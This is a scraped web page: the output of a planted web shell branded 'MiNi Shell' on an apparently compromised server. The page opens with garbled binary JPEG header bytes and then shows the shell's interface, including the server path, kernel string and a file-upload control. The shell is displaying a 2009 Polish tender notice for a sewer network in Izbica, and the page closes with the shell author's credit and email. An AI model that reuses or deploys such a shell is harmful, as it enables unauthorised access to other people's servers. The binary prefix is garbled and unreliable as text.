JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090206/19818-N-2009.html

<p class="kh_header"><b>Izbica: Budowa sieci kanalizacji sanitarnej w gminie Izbica III etap.</b><br>
<b>Numer ogłoszenia: 19818 - 2009; data zamieszczenia: 06.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Izbica , ul. Gminna 4, 22-375 Izbica, woj. lubelskie, tel. 084 6183034, faks 084 6183034.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.izbica.bip.mbnet.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa sieci kanalizacji sanitarnej w gminie Izbica III etap..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych w zakresie budowy   III etapu kanalizacji sanitarnej podciśnieniowej z odcinkami sieci grawitacyjnej w gminie Izbica o łącznej długości 5 668,5 m.
Projekt przewiduje budowę kanalizacji sanitarnej obejmującej : 

-sieć grawitacyjna O 200 mm z rur PP                 -   L =  909,5 m,
-przykanaliki grawitacyjne O 160mm z rur PP      -     L = 1 479,5 m
                                                                            
                                                  razem :         L = 2 389,0 m

-sieć podciśnieniowa O 160 mm PE                    -     L = 595,0 m
-sieć podciśnieniowa O 125 mm PE                    -     L = 386,0 m
-sieć podciśnieniowa O 110 mm PE                    -     L = 1642,0 m
-przyłączenie studzienek zbiorczych do sieci podciśnieniowej O 90 mm PE
	  -    L =  656,5 m
                                                                                   
                                                               razem :        L =  3 279,5 m

-zbiorcze studnie zaworowe główne h = 2,05 ÷ 4,05 m wyposażone w zawory        podciśnieniowe    -  98 sztuk,
-uzbrojenie sieci : zasuwy Dn 150 - 3 szt., Dn 100 - 8 szt.
-przejścia poprzeczne siecią pod drogą krajową Nr 17 Warszawa - Lublin - Hrebenne (szt. 2 ) w rurach ochronnych 315 mm o łącznej długości 34,0 mb na wysokości działek Nr 23 i 209/2 w Izbicy,
-sieć kanalizacyjna w przeważającej części przebiega przez teren dróg i ulic o nawierzchni utwardzonej oraz teren chodników i ogródków przydomowych.
 
Szczegółowy opis przedmiotu zamówienia, a w tym technologia i zakres ich wykonania określone zostały w dokumentacji projektowej i Specyfikacji Technicznej Wykonania i Odbioru Robót (STWiOR), które stanowią załączniki do SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.24.00-6, 45.23.24.40-8, 45.23.31.40-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium w kwocie 30.000 zł wniesione najpóźniej do wyznaczonego terminu składania ofert.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i ust. 2 ustawy z dnia 29 stycznia 2004 r. / tekst jedn. Dz. U. z 2007 r. Nr 223, poz.1655 z późn. zm / oraz spełniają warunki określone w art. 22 ust. 1 powołanej ustawy to jest :
1) posiadają uprawnienia do wykonywania działalności lub czynności określonej przedmiotem zamówienia.
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem  technicznym i osobami zdolnymi do wykonania zamówienia, w szczególności zrealizowali co najmniej 2 kontrakty, odpowiadające swoim rodzajem przedmiotowi zamówienia tzn. elementy kanalizacji sanitarnej podciśnieniowej -  każdy o wartości nie mniejszej niż 2 000 000 PLN.
3)  znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie   zamówienia,   tj. wykazują obroty w każdym roku obrotowym minimum 2 500 000 PLN oraz posiadają środki finansowe lub zdolność kredytową do kwoty minimum 500 000 PLN.
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia,
5) posiadają polisę ubezpieczeniową od odpowiedzialności cywilnej w zakresie   prowadzonej działalności gospodarczej zgodnej z przedmiotem niniejszego zamówienia na wartość minimalną 1 000 000 PLN i okres trwania umowy .
6) udzielą gwarancji na przedmiot zamówienia na okres nie krótszy niż 36 m-cy od daty  odbioru końcowego.
2. Wykonawcy ubiegający się wspólnie o udzielenie zamówienia obowiązani są do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy.
3. Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana  według formuły ,,spełnia - nie spełnia,,

Nie spełnienie jednego z warunków skutkować będzie wykluczeniem  wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia, że wykonawca posiada uprawnienia do wykonywania  określonej działalności lub czynności objętych przedmiotem zamówienia oraz nie podlega wykluczeniu na podstawie art. 24 ustawy , do oferty należy dołączyć następujące dokumenty:
1/ aktualny odpis z właściwego rejestru lub aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
2/ aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne  lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
3/ aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1, punkty od 4 do 9 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

W przypadku składania oferty przez Wykonawców występujących wspólnie  wyżej wymienione dokumenty i informacje musza być złożone przez każdego Wykonawcę .

1.1. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium  Rzeczypospolitej Polskiej, odnośnie pkt. VI 1 składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b) nie orzeczono wobec niego zakazu ubiegania się o zamówienie,
c) nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie  społeczne lub zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania  decyzji właściwego organu.
1.2. Odnośnie pkt. VI 1 składa zaświadczenie właściwego organu sadowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą w zakresie określonym w art. 24 ust. 1 pkt. 4-8 ustawy PZP.
1.3. Dokumenty te są składane w formie oryginału, odpisu, wypisu, wyciągu lub kopii przetłumaczonych na język polski.
1.4. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się tych dokumentów, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sadowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio w kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
1.5. Inne dokumenty dołączone do oferty, sporządzone w języku obcym, składane   są wraz   z tłumaczeniem na język polski, sporządzonym przez tłumacza przysięgłego.

2. W celu potwierdzenia, że Wykonawca posiada niezbędną  wiedzę i  doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, do oferty należy dołączyć następujące dokumenty:
1) wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z  informacjami na temat ich kwalifikacji zawodowych, a także zakresu wykonywanych przez nich czynności - do wykazu należy załączyć uprawnienia budowlane oraz aktualne zaświadczenie o przynależności do Izby Inżynierów Budownictwa ,
2) wykaz wykonanych w okresie ostatnich pięciu lat robót budowlanych, a  jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem    i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączenie dokumentów (referencji od Zamawiających lub protokołów odbioru końcowego) potwierdzających, że roboty te zostały wykonane należycie, co najmniej 2 kontrakty odpowiadające swoim rodzajem przedmiotowi zamówienia każdy o wartości nie mniejszej niż 2 000 000 PLN

    W przypadku składania oferty przez Wykonawców występujących wspólnie  wyżej wymienione dokumenty i informacje musza być złożone przez każdego Wykonawcę .

3. W celu potwierdzenia, że Wykonawca znajduje się w sytuacji ekonomicznej  i finansowej zapewniającej wykonanie zamówienia, do oferty należy dołączyć następujące dokumenty:
1) sprawozdanie finansowe, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią o badanym sprawozdaniu, a w przypadku wykonawców nie zobowiązanych do sporządzania sprawozdania finansowego, inne dokumenty określające obroty oraz zobowiązania i należności  - za okres nie krótszy niż ostatnie 2 lata obrotowe tj. 2007,2008 r., a jeżeli okres prowadzenia  działalności jest krótszy- za ten okres, obroty w każdym roku obrotowym minimum 2 500 000 PLN
2) informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy do kwoty minimum 500 000 PLN, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, 
3) polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej zgodnej z przedmiotem niniejszego zamówienia na wartość minimalną 1 000 000 PLN i okres trwania umowy.

    W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia wyżej wymienione dokumenty musza być złożone przez każdego Wykonawcę

4. W celu potwierdzenia, że oferowane dostawy i roboty budowlane odpowiadają wymaganiom  określonym przez zamawiającego należy złożyć następujące dokumenty :
1) deklarację zgodności proponowanych urządzeń z Polską Normą przenoszącą normę europejską,
2) oświadczenie potwierdzające oznaczenie proponowanych urządzeń europejskim znakiem bezpieczeństwa  CE


Kopie dokumentów muszą być potwierdzone za zgodność z oryginałem przez Wykonawcę lub przez osobę posiadającą odpowiednie pełnomocnictwo..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.izbica.bip.mbnet.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Izbica, ul. Gminna 4, 22-375 Izbica Referat Gospodarki Komunalnej, Transportu i Zarządzania Drogami, pok. Nr 1 w godz. 7.30 do 14.30.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.02.2009 godzina 10:00, miejsce: Urząd Gminy Izbica, ul. Gminna 4, 22-375 Izbica (Sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com